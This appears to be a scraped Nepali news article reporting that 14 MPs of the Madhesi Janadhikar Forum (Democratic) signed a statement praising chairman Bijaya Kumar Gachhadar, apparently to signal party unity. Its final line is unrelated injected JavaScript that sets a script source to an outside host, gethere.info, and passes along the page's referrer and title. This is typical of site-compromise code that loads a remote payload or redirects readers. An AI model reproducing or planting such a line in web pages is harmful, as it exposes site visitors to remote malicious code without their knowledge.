bijaya kumarकाठमाडौं, असोज २१ – सत्तामा सहभागी नभए पनि सत्तासंघर्षको विवाद खेपिरहेको मधेसी जनअधिकार फोरम (लोकतान्त्रिक) का १४ सांसद्ले अध्यक्ष विजयकुमार गच्छदारको प्रशंसा गर्दै विज्ञप्ति जारी गरेका छन् ।

ठूला दलसित गत वर्ष १६ बुँदे सहमति गरेदेखि राष्ट्रिय राजनीतिमा खेलेको भूमिका निर्णायक भएको ठहर गर्दै फोरम लोकतान्त्रिकका गच्छदारसहित सबै सांसदले विज्ञप्तिमा बिहीबार हस्ताक्षर गरेका छन् । ‘संविधान जारी हुँदाको कठीन परिस्थितिलाई चिर्न जसरी राष्ट्रिय अध्यक्ष सफल हुनुभयो, त्यसैगरी यस संविधानको संशोधन र कार्यान्वयनको चुनौती सामना गर्न सक्षम, समन्वयकारी एवं सक्रिय भूमिका अबका दिनहरुमा समेत उहाँबाट हुनेछ भन्ने विश्वास छ,’विज्ञप्तिमा उल्लेख छ ।

गच्छदारकै नेतृत्वका कारण पार्टी स्थापनाको आठ वर्ष पुग्दा बेग्लै छवि निर्माण भएको विज्ञप्तिमा उल्लेख छ । तर, वक्तव्यको सुरुदेखि अन्त्यसम्म गच्छदारको प्रशंसा किन गरियो भन्नेचाहिँ स्पष्ट छैन । वक्तव्यवमा हस्ताक्षर गर्ने एक सांसद्का अनुसार मंगलबारदेखि बिहीबारसम्म चलेको पार्टी बैठकमा दलको सत्तारोहणमा बाधक बनेको आरोप आफूमाथि लागेपछि गच्छदारले पार्टीमा असन्तुष्टि नरहेको , एक ढिक्का रहेको सन्देश दिन वक्तव्य जारी गराएका हुन् । आजको कान्तिपुर दैनिकमा खबर छ ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;